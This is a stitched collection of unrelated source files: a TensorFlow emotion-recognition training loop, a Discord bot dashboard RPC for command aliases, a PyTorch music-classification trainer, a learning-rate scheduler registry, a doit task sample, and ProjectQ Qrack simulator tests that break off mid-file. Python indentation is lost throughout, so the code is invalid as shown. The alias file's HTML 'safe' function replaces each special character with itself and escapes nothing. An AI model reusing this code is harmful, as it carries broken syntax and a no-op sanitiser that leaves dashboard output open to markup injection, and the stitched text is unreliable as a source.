sentences, targets, data_info, speakers = dataset(mode='sentences', embedding=embedding, embedding_size=embedding_size)
train_data = IeomapSentenceIterator(sentences[0], targets[0], data_info['sentences_length'][0], speakers[0])
val_data = IeomapSentenceIterator(sentences[1], targets[1], data_info['sentences_length'][1], speakers[1])
test_data = IeomapSentenceIterator(sentences[2], targets[2], data_info['sentences_length'][2], speakers[2])
########################################################################################################################
# Initialize the model
########################################################################################################################
g = SentenceModel(vocab_size=(data_info['vocabulary_size'] + 1),
embedding_size=embedding_size,
first_rnn_size=first_rnn_size,
num_classes=data_info['num_classes'],
dropout=dropout,
embedding=embedding,
num_speakers=num_speakers)
# Store model setup
model_setup = {'vocab_size': (data_info['vocabulary_size'] + 1),
'embedding_size': embedding_size,
'first_rnn_size': first_rnn_size,
'num_classes': data_info['num_classes'],
'dropout': dropout,
'embedding': embedding,
'num_speakers': num_speakers}
dirname = os.path.dirname(log_dir)
if not os.path.exists(dirname):
os.makedirs(dirname)
with open(log_dir + 'model_setup.p', 'w') as file:
json.dump(model_setup, file, indent=4)
########################################################################################################################
# Initialize the parameters
########################################################################################################################
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
saver = tf.train.Saver()
epoch = 0
best_epoch = 0
train_conf_matrix = 0
val_conf_matrix = 0
test_conf_matrix = 0
best_acc = 0
########################################################################################################################
# Performance Indicators
########################################################################################################################
writer_train = tf.summary.FileWriter(train_log_dir, sess.graph)
writer_val = tf.summary.FileWriter(val_log_dir)
accuracy_tf = tf.placeholder(tf.float32, [])
precision_tf = tf.placeholder(tf.float32, [])
recall_tf = tf.placeholder(tf.float32, [])
summary_op = tf.summary.scalar('accuracy', accuracy_tf)
summary_op = tf.summary.scalar('precision', precision_tf)
summary_op = tf.summary.scalar('recall', recall_tf)
########################################################################################################################
# Model training procedure
########################################################################################################################
while train_data.epoch < epochs: # and train_data.epoch < best_epoch + 20:
sentences_batch, sentences_length_batch, targets_batch, speakers_batch = train_data.next_batch(batch_size)
preds, _ = sess.run([g['preds'],
g['ts']],
feed_dict={g['x']: np.array(sentences_batch),
g['y']: np.array(targets_batch).reshape(len(targets_batch)),
g['speaker']: np.array(speakers_batch),
g['seqlen']: np.array(sentences_length_batch).reshape(len(targets_batch))})
####################################################################################################################
# Calculate the Train data Confusion Matrix
####################################################################################################################
train_conf_matrix += confusion_matrix(targets_batch, preds, labels=range(data_info['num_classes']))
####################################################################################################################
        # At the end of each training epoch, compute the validation results and store the relevant information
####################################################################################################################
if train_data.epoch != epoch:
while val_data.epoch == epoch:
sentences_batch, sentences_length_batch, targets_batch, speakers_batch = val_data.next_batch(batch_size)
preds = sess.run([g['preds']],
feed_dict={g['x']: np.array(sentences_batch),
g['y']: np.array(targets_batch).reshape(len(targets_batch)),
g['speaker']: np.array(speakers_batch),
g['seqlen']: np.array(sentences_length_batch).reshape(
len(targets_batch))})
############################################################################################################
                # Calculate the Validation data Confusion Matrix
############################################################################################################
val_conf_matrix += confusion_matrix(targets_batch, preds[0], labels=range(data_info['num_classes']))
################################################################################################################
# Compute Accuracy, Precision and Recall
################################################################################################################
train_CM_size = len(train_conf_matrix)
total_train = sum(sum(train_conf_matrix))
train_TP = np.diagonal(train_conf_matrix)
train_FP = [sum(train_conf_matrix[:, i]) - train_TP[i] for i in range(train_CM_size)]
train_FN = [sum(train_conf_matrix[i, :]) - train_TP[i] for i in range(train_CM_size)]
train_TN = train_CM_size - train_TP - train_FP - train_FN
train_precision = train_TP / (train_TP + train_FP) # aka True Positive Rate
train_recall = train_TP / (train_TP + train_FN)
total_train_correct = sum(train_TP)
total_train_accuracy = total_train_correct / total_train
total_train_precision = sum(train_precision) / train_CM_size
total_train_recall = sum(train_recall) / train_CM_size
val_CM_size = len(val_conf_matrix)
total_val = sum(sum(val_conf_matrix))
val_TP = np.diagonal(val_conf_matrix)
val_FP = [sum(val_conf_matrix[:, i]) - val_TP[i] for i in range(val_CM_size)]
val_FN = [sum(val_conf_matrix[i, :]) - val_TP[i] for i in range(val_CM_size)]
val_TN = val_CM_size - val_TP - val_FP - val_FN
val_precision = val_TP / (val_TP + val_FP)
val_recall = val_TP / (val_TP + val_FN)
total_val_correct = sum(val_TP)
total_val_accuracy = total_val_correct / total_val
total_val_precision = sum(val_precision) / val_CM_size
total_val_recall = sum(val_recall) / val_CM_size
################################################################################################################
# Store Accuracy Precision Recall
################################################################################################################
train_acc_summary = tf.Summary(
value=[tf.Summary.Value(tag="accuracy", simple_value=total_train_accuracy), ])
train_prec_summary = tf.Summary(
value=[tf.Summary.Value(tag="precision", simple_value=total_train_precision), ])
train_rec_summary = tf.Summary(value=[tf.Summary.Value(tag="recall", simple_value=total_train_recall), ])
val_acc_summary = tf.Summary(value=[tf.Summary.Value(tag="accuracy", simple_value=total_val_accuracy), ])
val_prec_summary = tf.Summary(
value=[tf.Summary.Value(tag="precision", simple_value=total_val_precision), ])
val_rec_summary = tf.Summary(value=[tf.Summary.Value(tag="recall", simple_value=total_val_recall), ])
writer_train.add_summary(train_acc_summary, epoch)
writer_train.add_summary(train_prec_summary, epoch)
writer_train.add_summary(train_rec_summary, epoch)
writer_val.add_summary(val_acc_summary, epoch)
writer_val.add_summary(val_prec_summary, epoch)
writer_val.add_summary(val_rec_summary, epoch)
writer_train.flush()
writer_val.flush()
################################################################################################################
# Print the confusion matrix and store important information
################################################################################################################
print(train_conf_matrix)
print(val_conf_matrix)
if best_acc < total_val_accuracy:
saver.save(sess, log_dir + "acc_best_validation_model.ckpt")
best_acc = total_val_accuracy
best_epoch = epoch
store_info = {'epoch': best_epoch,
'train_conf_matrix': list([list(x) for x in train_conf_matrix]),
'train_accuracy': total_train_accuracy,
'train_precision': list(train_precision),
'total_train_precision': total_train_precision,
'train_recall': list(train_recall),
'total_train_recall': total_train_recall,
'val_conf_matrix': list([list(x) for x in val_conf_matrix]),
'val_accuracy': total_val_accuracy,
'val_precision': list(val_precision),
'total_val_precision': total_val_precision,
'val_recall': list(val_recall),
'total_val_recall': total_val_recall}
store_convergence_info = {'epoch': train_data.epoch,
'train_conf_matrix': list([list(x) for x in train_conf_matrix]),
'train_accuracy': total_train_accuracy,
'train_precision': list(train_precision),
'total_train_precision': total_train_precision,
'train_recall': list(train_recall),
'total_train_recall': total_train_recall,
'val_conf_matrix': list([list(x) for x in val_conf_matrix]),
'val_accuracy': total_val_accuracy,
'val_precision': list(val_precision),
'total_val_precision': total_val_precision,
'val_recall': list(val_recall),
'total_val_recall': total_val_recall}
################################################################################################################
# Get ready for the next epoch
################################################################################################################
epoch += 1
train_conf_matrix = 0
val_conf_matrix = 0
################################################################################################################
####################################################################################################################
    # At the end of training, compute the test results and store the relevant information
####################################################################################################################
while test_data.epoch == 0:
sentences_batch, sentences_length_batch, targets_batch, speakers_batch = test_data.next_batch(batch_size)
preds = sess.run([g['preds']],
feed_dict={g['x']: np.array(sentences_batch),
g['y']: np.array(targets_batch).reshape(len(targets_batch)),
g['speaker']: np.array(speakers_batch),
g['seqlen']: np.array(sentences_length_batch).reshape(
len(targets_batch))})
############################################################################################################
# Calculate the Test data Confusion Matrix
############################################################################################################
test_conf_matrix += confusion_matrix(targets_batch, preds[0], labels=range(data_info['num_classes']))
################################################################################################################
# Compute Accuracy, Precision and Recall
################################################################################################################
test_CM_size = len(test_conf_matrix)
total_test = sum(sum(test_conf_matrix))
test_TP = np.diagonal(test_conf_matrix)
test_FP = [sum(test_conf_matrix[:, i]) - test_TP[i] for i in range(test_CM_size)]
test_FN = [sum(test_conf_matrix[i, :]) - test_TP[i] for i in range(test_CM_size)]
test_TN = test_CM_size - test_TP - test_FP - test_FN
test_precision = test_TP / (test_TP + test_FP)
test_recall = test_TP / (test_TP + test_FN)
total_test_correct = sum(test_TP)
total_test_accuracy = total_test_correct / total_test
total_test_precision = sum(test_precision) / test_CM_size
total_test_recall = sum(test_recall) / test_CM_size
################################################################################################################
# Print the confusion matrix and store important information
################################################################################################################
print(test_conf_matrix)
store_convergence_info['test_conf_matrix'] = list([list(x) for x in test_conf_matrix])
store_convergence_info['test_accuracy'] = total_test_accuracy
store_convergence_info['test_precision'] = list(test_precision)
store_convergence_info['total_test_precision'] = total_test_precision
store_convergence_info['test_recall'] = list(test_recall)
store_convergence_info['total_test_recall'] = total_test_recall
# trick to be able to save numpy.int64 into json
def default(o):
if isinstance(o, np.int64): return int(o)
raise TypeError
with open(log_dir + 'convergence_results.p', 'w') as file:
json.dump(store_convergence_info, file, default=default, indent=4)
saver.save(sess, log_dir + "convergence_model.ckpt")
####################################################################################################################
    # At the end of training, compute the test results of the best validation model and store the relevant information
####################################################################################################################
saver.restore(sess, log_dir + "acc_best_validation_model.ckpt")
test_conf_matrix = 0
while test_data.epoch == 1:
sentences_batch, sentences_length_batch, targets_batch, speakers_batch = test_data.next_batch(batch_size)
preds = sess.run([g['preds']],
feed_dict={g['x']: np.array(sentences_batch),
g['y']: np.array(targets_batch).reshape(len(targets_batch)),
g['speaker']: np.array(speakers_batch),
g['seqlen']: np.array(sentences_length_batch).reshape(
len(targets_batch))})
############################################################################################################
# Calculate the Test data Confusion Matrix
############################################################################################################
test_conf_matrix += confusion_matrix(targets_batch, preds[0], labels=range(data_info['num_classes']))
################################################################################################################
# Compute Accuracy, Precision and Recall
################################################################################################################
test_CM_size = len(test_conf_matrix)
total_test = sum(sum(test_conf_matrix))
test_TP = np.diagonal(test_conf_matrix)
test_FP = [sum(test_conf_matrix[:, i]) - test_TP[i] for i in range(test_CM_size)]
test_FN = [sum(test_conf_matrix[i, :]) - test_TP[i] for i in range(test_CM_size)]
test_TN = test_CM_size - test_TP - test_FP - test_FN
test_precision = test_TP / (test_TP + test_FP)
test_recall = test_TP / (test_TP + test_FN)
total_test_correct = sum(test_TP)
total_test_accuracy = total_test_correct / total_test
total_test_precision = sum(test_precision) / test_CM_size
total_test_recall = sum(test_recall) / test_CM_size
################################################################################################################
# Print the confusion matrix and store important information
################################################################################################################
print(test_conf_matrix)
store_info['test_conf_matrix'] = list([list(x) for x in test_conf_matrix])
store_info['test_accuracy'] = total_test_accuracy
store_info['test_precision'] = list(test_precision)
store_info['total_test_precision'] = total_test_precision
store_info['test_recall'] = list(test_recall)
store_info['total_test_recall'] = total_test_recall
with open(log_dir + 'acc_best_validation_results.p', 'w') as file:
json.dump(store_info, file, default=default, indent=4)
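# Hypothetical invocation of the routine above (illustration only; the argument
# values are placeholders and are not taken from the original experiments):
# if __name__ == '__main__':
#     emotion_recognition(n_run=1, epochs=50, batch_size=32, embedding_size=300,
#                         first_rnn_size=128, dropout=0.5, embedding='glove',
#                         num_speakers=2)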
| 2.171875 | 2 |
dashboard/rpc/alias.py | flaree/Toxic-Cogs | 0 | 6818 | <gh_stars>0
import discord
from redbot.core.bot import Red
from redbot.core.commands import commands
from redbot.core.utils.chat_formatting import humanize_list
from .utils import permcheck, rpccheck
class DashboardRPC_AliasCC:
def __init__(self, cog: commands.Cog):
self.bot: Red = cog.bot
self.cog: commands.Cog = cog
# Initialize RPC handlers
self.bot.register_rpc_handler(self.fetch_aliases)
def unload(self):
self.bot.unregister_rpc_handler(self.fetch_aliases)
@staticmethod
def safe(string):
return (
string.replace("&", "&")
.replace("<", "<")
.replace(">", ">")
.replace('"', """)
)
@rpccheck()
@permcheck("Alias", ["aliascc"])
async def fetch_aliases(self, guild: discord.Guild, member: discord.Member):
aliascog = self.bot.get_cog("Alias")
aliases = await aliascog._aliases.get_guild_aliases(guild)
ida = {}
for alias in aliases:
if len(alias.command) > 50:
command = alias.command[:47] + "..."
else:
command = alias.command
if alias.command not in ida:
ida[alias.command] = {"aliases": [], "shortened": command}
ida[alias.command]["aliases"].append(f"{self.safe(alias.name)}")
data = {}
for command, aliases in ida.items():
data[command] = {
"humanized": humanize_list(
list(map(lambda x: f"<code>{x}</code>", aliases["aliases"]))
),
"raw": aliases["aliases"],
"shortened": aliases["shortened"],
}
return data
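# Illustrative return value of fetch_aliases (hypothetical alias names, shown
# only to document the shape consumed by the dashboard):
# {"ping": {"humanized": "<code>p</code> and <code>pong</code>",
#           "raw": ["p", "pong"],
#           "shortened": "ping"}}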
| 2.109375 | 2 |
train.py | hafezgh/music_classification | 1 | 6819 | import torch
DEVICE = 'cuda'
import math
import torch.optim as optim
from model import *
import os
import copy, gzip, pickle, time
data_dir = './drive/MyDrive/music_classification/Data'
classes = os.listdir(data_dir+'/images_original')
def fit(model, train_loader, train_len, optimizer, criterion):
model.train()
batch_size = train_loader.batch_size
n_batches = math.ceil(train_len/batch_size)
#print('Batch Size:', batch_size,'Number of Batches:', n_batches)
model.train()
train_running_loss = 0.0
train_running_correct = 0
counter = 0
total = 0
#prog_bar = tqdm(enumerate(train_loader), total=int(train_len/batch_size))
for i, data in enumerate(train_loader):
counter += 1
data, target = data[0].to(DEVICE), data[1].to(DEVICE)
total += target.size(0)
optimizer.zero_grad()
outputs = model(data)
loss = criterion(outputs, target)
train_running_loss += loss.item()
_, preds = torch.max(outputs.data, 1)
train_running_correct += (preds == target).sum().item()
loss.backward()
optimizer.step()
train_loss = train_running_loss / counter
train_accuracy = 100. * train_running_correct / total
return train_loss, train_accuracy
def validate(model, val_loader, val_len, criterion):
model.eval()
val_running_loss = 0.0
val_running_correct = 0
counter = 0
total = 0
batch_size = val_len
#prog_bar = tqdm(enumerate(val_loader), total=int(val_len/batch_size))
with torch.no_grad():
for i, data in enumerate(val_loader):
counter += 1
data, target = data[0].to(DEVICE), data[1].to(DEVICE)
total += target.size(0)
outputs = model(data)
loss = criterion(outputs, target)
val_running_loss += loss.item()
_, preds = torch.max(outputs.data, 1)
val_running_correct += (preds == target).sum().item()
val_loss = val_running_loss / counter
val_accuracy = 100. * val_running_correct / total
return val_loss, val_accuracy
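# A hypothetical `hparams` dictionary for `train` below; the keys mirror how
# `hparams` is indexed in this file, but the concrete values are illustrative
# and are not taken from the original experiments.
# example_hparams = {'epochs': 50, 'lr': 1e-3, 'c': 1, 'h': 128, 'w': 431,
#                    'k': 3, 'filters': [64, 128], 'poolings': [(2, 2), (4, 4)],
#                    'dropout_rate': 0.3, 'gru_units': 64}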
def train(hparams, train_loader, val_loader, train_len, val_len, checkpoint_path=None, **kwargs):
model = CRNN_Base(len(classes), hparams['c'], hparams['h'], hparams['w'], hparams['k'], hparams['filters'],\
hparams['poolings'], hparams['dropout_rate'], gru_units=hparams['gru_units'])
model.to(DEVICE)
optimizer = optim.Adam(model.parameters(), lr=hparams['lr'])
try:
path = kwargs['path']
stream = gzip.open(path, "rb")
checkpoint = pickle.load(stream)
stream.close()
train_loss = checkpoint['train_loss']
train_accuracy = checkpoint['train_accuracy']
val_loss = checkpoint['val_loss']
val_accuracy = checkpoint['val_accuracy']
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
epoch_load = checkpoint['epoch']
print(f'Checkpoint found! Training will resume from epoch {epoch_load+1}')
print('Last epoch results: ')
print(f"Train Loss: {train_loss[-1]:.4f}, Train Acc: {train_accuracy[-1]:.2f}")
print(f'Val Loss: {val_loss[-1]:.4f}, Val Acc: {val_accuracy[-1]:.2f}')
if 'lr_scheduler' in kwargs.keys() and 'scheduler_state_dict' in checkpoint.keys():
if kwargs['lr_scheduler'] == True:
                print('Learning rate scheduler is active.\n')
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.1, last_epoch=-1, verbose=True)
scheduler.load_state_dict(checkpoint['scheduler_state_dict'])
else:
scheduler = False
else:
scheduler = False
except:
print('No checkpoints found! Training will start from the beginning.\n')
train_loss, train_accuracy = [], []
val_loss, val_accuracy = [], []
epoch_load = 0
scheduler = None
es = False
if 'lr_scheduler' in kwargs.keys():
if kwargs['lr_scheduler'] == True:
                print('Learning rate scheduler is active.\n')
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.1, last_epoch=-1, verbose=True)
else:
scheduler = False
else:
scheduler = False
es = False
if 'early_stopping' in kwargs.keys():
print('Early stopping is active.')
print()
es = True
min_val_loss = np.inf
patience = 30
epochs_no_improve = 0
best_model = None
criterion = nn.CrossEntropyLoss()
start = time.time()
for epoch in range(hparams['epochs']-epoch_load):
print(f"Epoch {epoch+epoch_load+1} of {hparams['epochs']}")
train_epoch_loss, train_epoch_accuracy = fit(
model, train_loader, train_len, optimizer, criterion
)
val_epoch_loss, val_epoch_accuracy = validate(
model, val_loader, val_len, criterion
)
if scheduler:
scheduler.step()
train_loss.append(train_epoch_loss)
train_accuracy.append(train_epoch_accuracy)
val_loss.append(val_epoch_loss)
val_accuracy.append(val_epoch_accuracy)
if es:
if val_epoch_loss < min_val_loss:
#Saving the model
min_val_loss = val_epoch_loss
best_model = copy.deepcopy(model.state_dict())
epochs_no_improve = 0
else:
epochs_no_improve += 1
# Check early stopping condition
if epochs_no_improve == patience:
print(f'Early stopping after {epoch+epoch_load+1} epochs!')
model.load_state_dict(best_model)
break
print(f"Train Loss: {train_epoch_loss:.4f}, Train Acc: {train_epoch_accuracy:.2f}")
print(f'Val Loss: {val_epoch_loss:.4f}, Val Acc: {val_epoch_accuracy:.2f}')
checkpoint_to_save = {'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'epoch': epoch+epoch_load,
'train_loss': train_loss,
'val_loss': val_loss,
'train_accuracy': train_accuracy,
'val_accuracy': val_accuracy
}
if scheduler:
checkpoint_to_save['scheduler_state_dict'] = scheduler.state_dict()
## Saving the model
if checkpoint_path != None:
stream = gzip.open(checkpoint_path, "wb")
pickle.dump(checkpoint_to_save, stream)
stream.close()
end = time.time()
print(f"Training time: {(end-start)/60:.3f} minutes")
return model, train_loss, train_accuracy, val_loss, val_accuracy | 2.390625 | 2 |
dlk/core/schedulers/__init__.py | cstsunfu/dlkit | 0 | 6820 | <filename>dlk/core/schedulers/__init__.py
# Copyright 2021 cstsunfu. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""schedulers"""
import importlib
import os
from dlk.utils.register import Register
from torch.optim import Optimizer
from torch.optim.lr_scheduler import LambdaLR
import math
scheduler_config_register = Register("Schedule config register.")
scheduler_register = Register("Schedule register.")
class BaseScheduler(object):
"""interface for Schedule"""
def get_scheduler(self)->LambdaLR:
"""return the initialized scheduler
Returns:
Schedule
"""
raise NotImplementedError
def __call__(self):
"""the same as self.get_scheduler()
"""
return self.get_scheduler()
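# Minimal sketch of a concrete scheduler (illustrative only, not one of the
# schedulers shipped in this package): a subclass wraps an optimizer and
# returns a configured LambdaLR from get_scheduler().
#
# class ConstantScheduler(BaseScheduler):
#     def __init__(self, optimizer: Optimizer):
#         self.optimizer = optimizer
#
#     def get_scheduler(self) -> LambdaLR:
#         # keep the learning rate constant: multiply it by 1.0 at every step
#         return LambdaLR(self.optimizer, lambda current_step: 1.0)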
def import_schedulers(schedulers_dir, namespace):
for file in os.listdir(schedulers_dir):
path = os.path.join(schedulers_dir, file)
if (
not file.startswith("_")
and not file.startswith(".")
and (file.endswith(".py") or os.path.isdir(path))
):
scheduler_name = file[: file.find(".py")] if file.endswith(".py") else file
importlib.import_module(namespace + "." + scheduler_name)
# automatically import any Python files in the schedulers directory
schedulers_dir = os.path.dirname(__file__)
import_schedulers(schedulers_dir, "dlk.core.schedulers")
| 2.390625 | 2 |
doc/samples/pos.py | m4ta1l/doit | 1,390 | 6821 | def task_pos_args():
def show_params(param1, pos):
print('param1 is: {0}'.format(param1))
for index, pos_arg in enumerate(pos):
print('positional-{0}: {1}'.format(index, pos_arg))
return {'actions':[(show_params,)],
'params':[{'name':'param1',
'short':'p',
'default':'default value'},
],
'pos_arg': 'pos',
'verbosity': 2,
}
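# Example invocation (hypothetical values): running `doit pos_args -p 4 foo bar`
# is expected to print the named parameter followed by each positional argument:
#   param1 is: 4
#   positional-0: foo
#   positional-1: bar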
| 2.671875 | 3 |
projectq/backends/_qracksim/_simulator_test.py | vm6502q/ProjectQ | 1 | 6822 | # Copyright 2017 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for projectq.backends._qracksim._simulator.py, using the Qrack
simulator (QEngine and QUnit layers) as backend.
"""
import copy
import math
import cmath
import numpy
import pytest
import random
import scipy
import scipy.sparse
import scipy.sparse.linalg
from projectq import MainEngine
from projectq.cengines import (BasicEngine, BasicMapperEngine, DummyEngine,
LocalOptimizer, NotYetMeasuredError)
from projectq.ops import (All, Allocate, BasicGate, BasicMathGate, CNOT, C,
Command, H, Measure, QubitOperator, Rx, Ry, Rz, S,
TimeEvolution, Toffoli, X, Y, Z, Swap, SqrtSwap,
UniformlyControlledRy, UniformlyControlledRz)
from projectq.libs.math import (AddConstant,
AddConstantModN,
SubConstant,
SubConstantModN,
MultiplyByConstantModN)
from projectq.meta import Compute, Uncompute, Control, Dagger, LogicalQubitIDTag
from projectq.types import WeakQubitRef
from projectq.backends import Simulator
tolerance = 1e-6
def test_is_qrack_simulator_present():
_qracksim = pytest.importorskip("projectq.backends._qracksim._qracksim")
import projectq.backends._qracksim._qracksim as _
def get_available_simulators():
result = []
try:
test_is_qrack_simulator_present()
result.append("qrack_simulator_qengine")
result.append("qrack_simulator_qunit")
except:
pass
return result
@pytest.fixture(params=get_available_simulators())
def sim(request):
if request.param == "qrack_simulator_qengine":
from projectq.backends._qracksim._qracksim import QrackSimulator as QrackSim
sim = Simulator()
sim._simulator = QrackSim(1, -1, 1)
elif request.param == "qrack_simulator_qunit":
from projectq.backends._qracksim._qracksim import QrackSimulator as QrackSim
sim = Simulator()
sim._simulator = QrackSim(1, -1, 2)
return sim
@pytest.fixture(params=["mapper", "no_mapper"])
def mapper(request):
"""
Adds a mapper which changes qubit ids by adding 1
"""
if request.param == "mapper":
class TrivialMapper(BasicMapperEngine):
def __init__(self):
BasicEngine.__init__(self)
self.current_mapping = dict()
def receive(self, command_list):
for cmd in command_list:
for qureg in cmd.all_qubits:
for qubit in qureg:
if qubit.id == -1:
continue
elif qubit.id not in self.current_mapping:
previous_map = self.current_mapping
previous_map[qubit.id] = qubit.id + 1
self.current_mapping = previous_map
self._send_cmd_with_mapped_ids(cmd)
return TrivialMapper()
if request.param == "no_mapper":
return None
class Mock1QubitGate(BasicGate):
def __init__(self):
BasicGate.__init__(self)
self.cnt = 0
@property
def matrix(self):
self.cnt += 1
return numpy.matrix([[0, 1],
[1, 0]])
class Mock6QubitGate(BasicGate):
def __init__(self):
BasicGate.__init__(self)
self.cnt = 0
@property
def matrix(self):
self.cnt += 1
return numpy.eye(2 ** 6)
class MockNoMatrixGate(BasicGate):
def __init__(self):
BasicGate.__init__(self)
self.cnt = 0
@property
def matrix(self):
self.cnt += 1
raise AttributeError
def test_simulator_is_available(sim):
backend = DummyEngine(save_commands=True)
eng = MainEngine(backend, [])
qubit = eng.allocate_qubit()
Measure | qubit
qubit[0].__del__()
assert len(backend.received_commands) == 3
# Test that allocate, measure, basic math, and deallocate are available.
for cmd in backend.received_commands:
assert sim.is_available(cmd)
new_cmd = backend.received_commands[-1]
new_cmd.gate = Mock6QubitGate()
assert not sim.is_available(new_cmd)
new_cmd.gate = MockNoMatrixGate()
assert not sim.is_available(new_cmd)
new_cmd.gate = Mock1QubitGate()
assert sim.is_available(new_cmd)
new_cmd = backend.received_commands[-2]
assert len(new_cmd.qubits) == 1
new_cmd.gate = AddConstantModN(1, 2)
assert sim.is_available(new_cmd)
new_cmd.gate = MultiplyByConstantModN(1, 2)
assert sim.is_available(new_cmd)
#new_cmd.gate = DivideByConstantModN(1, 2)
#assert sim.is_available(new_cmd)
def test_simulator_cheat(sim):
# cheat function should return a tuple
assert isinstance(sim.cheat(), tuple)
# first entry is the qubit mapping.
# should be empty:
assert len(sim.cheat()[0]) == 0
# state vector should only have 1 entry:
assert len(sim.cheat()[1]) == 1
eng = MainEngine(sim, [])
qubit = eng.allocate_qubit()
# one qubit has been allocated
assert len(sim.cheat()[0]) == 1
assert sim.cheat()[0][0] == 0
assert len(sim.cheat()[1]) == 2
assert 1. == pytest.approx(abs(sim.cheat()[1][0]))
qubit[0].__del__()
# should be empty:
assert len(sim.cheat()[0]) == 0
# state vector should only have 1 entry:
assert len(sim.cheat()[1]) == 1
def test_simulator_functional_measurement(sim):
eng = MainEngine(sim, [])
qubits = eng.allocate_qureg(5)
# entangle all qubits:
H | qubits[0]
for qb in qubits[1:]:
CNOT | (qubits[0], qb)
All(Measure) | qubits
bit_value_sum = sum([int(qubit) for qubit in qubits])
assert bit_value_sum == 0 or bit_value_sum == 5
def test_simulator_measure_mapped_qubit(sim):
eng = MainEngine(sim, [])
qb1 = WeakQubitRef(engine=eng, idx=1)
qb2 = WeakQubitRef(engine=eng, idx=2)
cmd0 = Command(engine=eng, gate=Allocate, qubits=([qb1],))
cmd1 = Command(engine=eng, gate=X, qubits=([qb1],))
cmd2 = Command(engine=eng, gate=Measure, qubits=([qb1],), controls=[],
tags=[LogicalQubitIDTag(2)])
with pytest.raises(NotYetMeasuredError):
int(qb1)
with pytest.raises(NotYetMeasuredError):
int(qb2)
eng.send([cmd0, cmd1, cmd2])
eng.flush()
with pytest.raises(NotYetMeasuredError):
int(qb1)
assert int(qb2) == 1
def test_simulator_kqubit_exception(sim):
m1 = Rx(0.3).matrix
m2 = Rx(0.8).matrix
m3 = Ry(0.1).matrix
m4 = Rz(0.9).matrix.dot(Ry(-0.1).matrix)
m = numpy.kron(m4, numpy.kron(m3, numpy.kron(m2, m1)))
class KQubitGate(BasicGate):
@property
def matrix(self):
return m
eng = MainEngine(sim, [])
qureg = eng.allocate_qureg(3)
with pytest.raises(Exception):
KQubitGate() | qureg
with pytest.raises(Exception):
H | qureg
def test_simulator_swap(sim):
eng = MainEngine(sim, [])
qubits1 = eng.allocate_qureg(1)
qubits2 = eng.allocate_qureg(1)
X | qubits1
Swap | (qubits1, qubits2)
All(Measure) | qubits1
All(Measure) | qubits2
assert (int(qubits1[0]) == 0) and (int(qubits2[0]) == 1)
SqrtSwap | (qubits1, qubits2)
SqrtSwap | (qubits1, qubits2)
All(Measure) | qubits1
All(Measure) | qubits2
assert (int(qubits1[0]) == 1) and (int(qubits2[0]) == 0)
def test_simulator_math(sim):
eng = MainEngine(sim, [])
qubits = eng.allocate_qureg(8)
AddConstant(1) | qubits;
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 1
AddConstantModN(10, 256) | qubits;
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 11
controls = eng.allocate_qureg(1)
# Control is off
C(AddConstantModN(10, 256)) | (controls, qubits)
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 11
# Turn control on
X | controls
C(AddConstantModN(10, 256)) | (controls, qubits)
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 21
SubConstant(5) | qubits;
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 16
C(SubConstantModN(10, 256)) | (controls, qubits)
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 6
# Turn control off
X | controls
C(SubConstantModN(10, 256)) | (controls, qubits)
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 6
MultiplyByConstantModN(2, 256) | qubits;
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 12
# Control is off
C(MultiplyByConstantModN(2, 256)) | (controls, qubits)
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 12
# Turn control on
X | controls
C(MultiplyByConstantModN(10, 256)) | (controls, qubits)
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 120
def test_simulator_probability(sim, mapper):
engine_list = [LocalOptimizer()]
if mapper is not None:
engine_list.append(mapper)
eng = MainEngine(sim, engine_list=engine_list)
qubits = eng.allocate_qureg(6)
All(H) | qubits
eng.flush()
bits = [0, 0, 1, 0, 1, 0]
for i in range(6):
assert (eng.backend.get_probability(bits[:i], qubits[:i]) ==
pytest.approx(0.5**i))
extra_qubit = eng.allocate_qubit()
with pytest.raises(RuntimeError):
eng.backend.get_probability([0], extra_qubit)
del extra_qubit
All(H) | qubits
Ry(2 * math.acos(math.sqrt(0.3))) | qubits[0]
eng.flush()
assert eng.backend.get_probability([0], [qubits[0]]) == pytest.approx(0.3)
Ry(2 * math.acos(math.sqrt(0.4))) | qubits[2]
eng.flush()
assert eng.backend.get_probability([0], [qubits[2]]) == pytest.approx(0.4)
assert (numpy.isclose(0.12, eng.backend.get_probability([0, 0], qubits[:3:2]), rtol=tolerance, atol=tolerance))
assert (numpy.isclose(0.18, eng.backend.get_probability([0, 1], qubits[:3:2]), rtol=tolerance, atol=tolerance))
assert (numpy.isclose(0.28, eng.backend.get_probability([1, 0], qubits[:3:2]), rtol=tolerance, atol=tolerance))
All(Measure) | qubits
def test_simulator_amplitude(sim, mapper):
